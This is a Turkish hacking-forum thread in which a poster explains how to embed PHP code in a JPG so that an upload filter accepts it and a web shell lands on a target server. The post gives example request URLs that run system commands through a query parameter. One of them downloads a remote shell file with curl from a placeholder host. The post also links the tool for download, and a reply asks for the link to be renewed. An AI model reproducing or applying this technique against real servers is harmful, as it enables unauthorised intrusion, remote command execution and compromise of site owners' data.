İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

Shell JPG İnjection //PoisonScorpion

08-11-2011 20:04
#1
PoisonScorpion - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
10/2011
Nereden:
İstanbul
Mesajlar:
1.389
Teşekkür (Etti):
13
Teşekkür (Aldı):
1075
Konular:
431
Ticaret:
(0) %
PoisonScorpion ;

Selamun aLeyküm , Kardeşlerim..

Dipnot :
''Öncelikle belirteyim konumuzun amacı sunucuya shell sokmaktır.''

Not :


''Çoğu sunucularda upload bölümünde .PHP uzantısı kabul edilmez.
Bizimde sunucuya girmek için .PHP uzantısı yüklememiz gerekir.
Bu yöntemimiz ile servera .JPG uzantılı dosya yedireceğiz.''


Dipnot :
''Öncelikle belirteyim uygulayacağımız sunucunun ’Safe Mode : OFF , system - passthru - fopenfonksiyonları açık olmalıdır''

Şimdi bizim amacımız 4 kb’lık bir resim dosyasının içine php kodlarla code injection yapmaktır.

Dosyayı normal upload etme yöntemiyle ediyoruz ve aşşağıdaki gibi kullanıyoruz.

http://www.hedefsitemiz.com/klasor/t_passthru.jpg?cw=id
http://www.hedefsitemiz.com/klasor/t_passthru.jpg?cw=ls -lia
http://www.hedefsitemiz.com/klasor/t...ru.jpg?cw=curl -o shell.php shelladresi.com/shell.txt


Kod:
http://www.zshare.net/download/958299999d92750c/


//PoisonScorpion

jofi Teşekkür etti.

25-05-2012 13:52
#2
jofi - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
02/2008
Mesajlar:
4
Teşekkür (Etti):
2
Teşekkür (Aldı):
0
Konular:
0
Ticaret:
(0) %
linki yenilermisin rica etsem

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı